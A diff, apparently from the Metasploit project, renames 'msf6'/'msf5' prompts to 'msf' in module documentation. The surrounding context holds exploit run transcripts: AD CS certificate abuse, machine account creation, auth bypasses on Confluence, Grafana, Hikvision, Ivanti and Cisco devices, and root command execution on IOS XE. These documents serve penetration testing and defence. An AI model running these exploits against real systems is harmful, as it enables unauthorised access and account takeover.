-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
+msf auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
 ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
+msf auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
 ALT_UPN => smcintyre@msflab.local
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set VERBOSE true
+msf auxiliary(admin/dcerpc/icpr_cert) > set VERBOSE true
 VERBOSE => true
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
@@ -183,7 +189,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230608111432_default_192.168.159.10_windows.ad.cs_029062.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) > 
+msf auxiliary(admin/dcerpc/icpr_cert) > 
 ```

 ### Issue A Certificate With The *Any Purpose* EKU (AKA ESC2)
@@ -202,18 +208,18 @@ information.
 The first step is to issue a certificate using the vulnerable certificate template.

 ```msf
-msf6 > use auxiliary/admin/dcerpc/icpr_cert 
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+msf > use auxiliary/admin/dcerpc/icpr_cert 
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
 SMBUser => aliddle
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
 CA => msflab-DC-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Test
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Test
 CERT_TEMPLATE => ESC2-Test
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
@@ -223,7 +229,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [+] 192.168.159.10:445 - The requested certificate was issued.
 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 #### Step 2
@@ -232,13 +238,13 @@ the target user. The `CERT_TEMPLATE` option is updated to one allowing authentic
 template.

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
+msf auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
 PFX => /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
+msf auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
 ON_BEHALF_OF => MSFLAB\smcintyre
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
 CERT_TEMPLATE => User
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
@@ -251,7 +257,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153713_default_unknown_windows.ad.cs_275853.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 ### Issue A Certificate With The *Certificate Request Agent* EKU (AKA ESC3)
@@ -270,18 +276,18 @@ request another certificate on behalf of the target account.
 The first step is to issue a certificate using the vulnerable certificate template.

 ```msf
-msf6 > use auxiliary/admin/dcerpc/icpr_cert
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+msf > use auxiliary/admin/dcerpc/icpr_cert
+msf auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
 RHOSTS => 192.168.159.10
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
 SMBUser => aliddle
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+msf auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
 SMBPass => Password1!
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+msf auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
 CA => msflab-DC-CA
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Test
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Test
 CERT_TEMPLATE => ESC3-Test
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
@@ -293,7 +299,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 #### Step 2
@@ -302,13 +308,13 @@ the target user. The `CERT_TEMPLATE` option is updated to one allowing authentic
 template.

 ```msf
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
+msf auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
 PFX => /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
+msf auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
 ON_BEHALF_OF => MSFLAB\smcintyre
-msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+msf auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
 CERT_TEMPLATE => User
-msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+msf auxiliary(admin/dcerpc/icpr_cert) > run
 [*] Running module against 192.168.159.10

 [*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
@@ -321,7 +327,7 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) > run
 [*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
 [*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154740_default_unknown_windows.ad.cs_567059.pfx
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/icpr_cert) >
+msf auxiliary(admin/dcerpc/icpr_cert) >
 ```

 [KB5014754]: https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
@@ -63,13 +63,13 @@ its security ID (SID), which includes the relative ID (RID) as the last componen
 First, a new computer account is created and its details are logged to the database.

 ```
-msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.96
+msf auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.96
 RHOSTS => 192.168.159.96
-msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser aliddle
+msf auxiliary(admin/dcerpc/samr_account) > set SMBUser aliddle
 SMBUser => aliddle
-msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1
+msf auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1
 SMBPass => Password1
-msf6 auxiliary(admin/dcerpc/samr_account) > show options
+msf auxiliary(admin/dcerpc/samr_account) > show options

 Module options (auxiliary/admin/dcerpc/samr_account):

@@ -91,13 +91,13 @@ Auxiliary action:
   ADD_COMPUTER  Add a computer account


-msf6 auxiliary(admin/dcerpc/samr_account) > run
+msf auxiliary(admin/dcerpc/samr_account) > run
 [*] Running module against 192.168.159.96

 [*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
 [+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/dcerpc/samr_account) > creds
+msf auxiliary(admin/dcerpc/samr_account) > creds
 Credentials
 ===========

@@ -105,5 +105,5 @@ host            origin          service        public             private
 ----            ------          -------        ------             -------                           -----   ------------  ----------
 192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password

-msf6 auxiliary(admin/dcerpc/samr_account) >
+msf auxiliary(admin/dcerpc/samr_account) >
 ```
@@ -35,14 +35,14 @@ E-mail to be used when creating a new user with admin privileges.
 ## Scenarios
 ### Tested on Confluence Server 8.0.0 with Linux target (Ubuntu 20.04)
 ```
-msf6 > use auxiliary/multi/http/atlassian_confluence_auth_bypass
-msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set RHOSTS <YOUR_TARGET>
+msf > use auxiliary/multi/http/atlassian_confluence_auth_bypass
+msf > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set RHOSTS <YOUR_TARGET>
 RHOSTS => <YOUR_TARGET>
-msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_USERNAME admin_1337
+msf > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_USERNAME admin_1337
 NEW_USERNAME => admin_1337
-msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_PASSWORD admin_1337
+msf > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_PASSWORD admin_1337
 NEW_PASSWORD => admin_1337
-msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
+msf > auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
 [*] Running module against <YOUR_TARGET>

 [+] Admin user was created successfully. Credentials: admin_1337 - admin_1337
@@ -38,14 +38,14 @@ The desired username for setting SSH access
 #### Successful Scenario

 ```
-msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
 user => test
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
 pass => test
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
 rhosts => 192.168.110.209
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run

 [*] Running for 192.168.110.209...
 [*] 192.168.110.209 - Attempting to set SSH credentials.
@@ -55,7 +55,7 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
 [*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
+msf auxiliary(linux/ssh/cve_2020_16137) > exit
 user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
 test@192.168.110.209's password:

@@ -225,14 +225,14 @@ $>exit

 #### Unsuccessful Scenario
 ```
-msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
 user => test
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
 pass => test
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
 rhosts => 192.168.110.209
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run

 [*] Running for 192.168.110.209...
 [*] 192.168.110.209 - Attempting to set SSH credentials.
@@ -246,14 +246,14 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
 #### Successful Scenario

 ```
-msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
 user => test
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
 pass => test
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
 rhosts => 192.168.110.209
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run

 [*] Running for 192.168.110.209...
 [*] 192.168.110.209 - Attempting to set SSH credentials.
@@ -263,7 +263,7 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
 [*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
+msf auxiliary(linux/ssh/cve_2020_16137) > exit
 user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
 test@192.168.110.209's password:

@@ -433,14 +433,14 @@ $>exit

 #### Unsuccessful Scenario
 ```
-msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
 user => test
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
 pass => test
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
 rhosts => 192.168.110.209
-msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run

 [*] Running for 192.168.110.209...
 [*] 192.168.110.209 - Attempting to set SSH credentials.
@@ -97,14 +97,14 @@ modes are `user`, `privileged`, and `global`.

 ### IOS XE 16.12.03 (CSR1000v)
 ```
-msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
+msf > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
 RHOST => 192.168.86.57
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "show version"
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "show version"
 CMD => show version
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set MODE privileged
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set MODE privileged
 MODE => privileged
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options

 Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):

@@ -121,7 +121,7 @@ Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
 [*] Running module against 192.168.86.57


@@ -171,19 +171,19 @@ Processor board ID 9OVFUOGPESO
 Configuration register is 0x2102

 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
 [*] Running module against 192.168.86.57


 *15:24:05.110 UTC Fri Nov 3 2023
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
 ```

 ### IOS XE 17.06.05 (C8000v)

 ```
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options 
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options 

 Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):

@@ -200,7 +200,7 @@ Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
 [*] Running module against 192.168.86.108

 Cisco IOS XE Software, Version 17.06.05
@@ -253,10 +253,10 @@ Router operating mode: Autonomous
 Configuration register is 0x2102

 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
 [*] Running module against 192.168.86.108

 *17:36:50.722 UTC Mon Mar 3 2025
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
-```
+msf auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
+```
@@ -92,7 +92,7 @@ can be locked preventing deleting upon the first attempt, so the module will try
 ## Scenarios

 ```
-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options
+msf auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options

 Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):

@@ -115,11 +115,11 @@ Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):

 View the full module info with the info, or info -d command.

-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set rhosts 10.5.135.193
+msf auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set rhosts 10.5.135.193
 rhosts => 10.5.135.193
-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set verbose true
+msf auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set verbose true
 verbose => true
-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
+msf auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
 [*] Running module against 10.5.135.193

 [*] Created privilege 15 user 'rfojGrqA' with password 'ixnXyFlw'
@@ -129,5 +129,5 @@ uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t
 [*] Removing user 'rfojGrqA'
 [*] Auxiliary module execution completed

-msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 
-```
+msf auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 
+```
@@ -40,9 +40,9 @@ Running the module against Smart Software Manager (SSM) On-Prem v8-202206 should
 similar to the following:

 ```
-msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
-msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
-msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
+msf > use auxiliary/admin/http/cisco_ssm_onprem_account 
+msf auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
+msf auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
 [*] Running module against 192.168.137.200

 [+] Server reachable.
@@ -51,7 +51,7 @@ Running the module against FileCatalyst Workflow v5.1.6 (Build 135) on either Wi
 similar to the following:

 ```
-msf6 auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
+msf auxiliary(admin/http/fortra_filecatalyst_workflow_sqli) > run
 [*] Running module against 192.168.137.195

 [*] Starting SQL injection workflow...
@@ -56,7 +56,7 @@ resource (gitlab)> set myemail my_email@example.com
 myemail => my_email@example.com
 resource (gitlab)> set verbose true
 verbose => true
-msf6 auxiliary(scanner/admin/gitlab_password_reset_account_takeover) > exploit
+msf auxiliary(scanner/admin/gitlab_password_reset_account_takeover) > exploit

 [*] Obtaining CSRF token
 [+] CSRF Token: URTwtcW7cTgXEoFoa0To9jTXCubxXpJwcCiLjXbrAIFeO5TJza9x-amxcWGmX2oC8SppWeTIIWUG19WCvW_2ig
@@ -22,8 +22,8 @@ The following list shows the vulnerable versions of Grafana when configured for
  Example run against Grafana 3.x with username admin:

 ```
-msf5 > use auxiliary/admin/http/grafana_auth_bypass 
-msf5 auxiliary(admin/http/grafana_auth_bypass) > show options 
+msf > use auxiliary/admin/http/grafana_auth_bypass 
+msf auxiliary(admin/http/grafana_auth_bypass) > show options 

 Module options (auxiliary/admin/http/grafana_auth_bypass):

@@ -38,11 +38,11 @@ Module options (auxiliary/admin/http/grafana_auth_bypass):
   USERNAME                    no        Valid username
   VERSION    5                yes       Grafana version: "2-4" or "5" (Accepted: 2-4, 5)

-msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
+msf auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
 RHOSTS => 192.168.202.3
-msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
+msf auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
 USERNAME => Administrator
-msf5 auxiliary(admin/http/grafana_auth_bypass) > run
+msf auxiliary(admin/http/grafana_auth_bypass) > run

 [*] Running for 192.168.202.3...
 [+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f
@@ -59,18 +59,18 @@ This option allows you to store the user and password credentials in the Metaspl
 ### Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525

 ```
-msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
+msf > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
 RHOSTS => 192.168.100.180
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
 USERNAME => admin
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
 PASSWORD => Pa$$W0rd
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
 ID => 1
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
 STORE_CRED => true
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options

 Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):

@@ -87,13 +87,13 @@ Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
   USERNAME    admin            yes       Username for password change
   VHOST                        no        HTTP server virtual host

-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check

 [*] Following users are available for password reset...
 [*] USERNAME:admin | ID:1 | ROLE:Administrator
 [*] USERNAME:admln | ID:2 | ROLE:Operator
 [+] 192.168.100.180:80 - The target is vulnerable.
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
 [*] Running module against 192.168.100.180

 [*] Following users are available for password reset...
@@ -104,7 +104,7 @@ msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
 [*] Please log in with your new password: Pa$$W0rd
 [*] Credentials for admin were added to the database...
 [*] Auxiliary module execution completed
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
 Credentials
 ===========

@@ -112,5 +112,5 @@ host             origin           service        public  private   realm  privat
 ----             ------           -------        ------  -------   -----  ------------  ----------
 192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password

-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) 
+msf auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) 
 ```
@@ -25,7 +25,7 @@ Module defaults work very well, you should just need to set `RHOST` and the `FIL
 A successful exploit will look like this:

 ```
-msf5 auxiliary(admin/http/ibm_drm_file_download) > run
+msf auxiliary(admin/http/ibm_drm_file_download) > run

 [+] 10.9.8.213:8443 - Successfully "stickied" our session ID kmhleyPh
 [+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1
@@ -41,8 +41,8 @@ Running the module against Control iD iDSecure v4.7.43.0 should result in an out
 similar to the following:

 ```
-msf6 > use auxiliary/admin/http/idsecure_auth_bypass
-msf6 auxiliary(admin/http/idsecure_auth_bypass) > set RHOSTS 192.168.137.196
+msf > use auxiliary/admin/http/idsecure_auth_bypass
+msf auxiliary(admin/http/idsecure_auth_bypass) > set RHOSTS 192.168.137.196
 [*] Running module against 192.168.137.196

 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -51,9 +51,9 @@ Running the module against Virtual Traffic Manager (vTM) 22.7R1 should result in
 similar to the following:

 ```
-msf6 > use auxiliary/admin/http/ivanti_vtm_admin 
-msf6 auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
-msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit 
+msf > use auxiliary/admin/http/ivanti_vtm_admin 
+msf auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
+msf auxiliary(admin/http/ivanti_vtm_admin) > exploit 
 [*] Running module against 172.17.0.2

 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -54,8 +54,8 @@ This vulnerability was discovered and exploited by an independent security resea

 ### Netgear AC1600 aka R6260 with Firmware Version 1.1.0.40_1.0.1
 ```
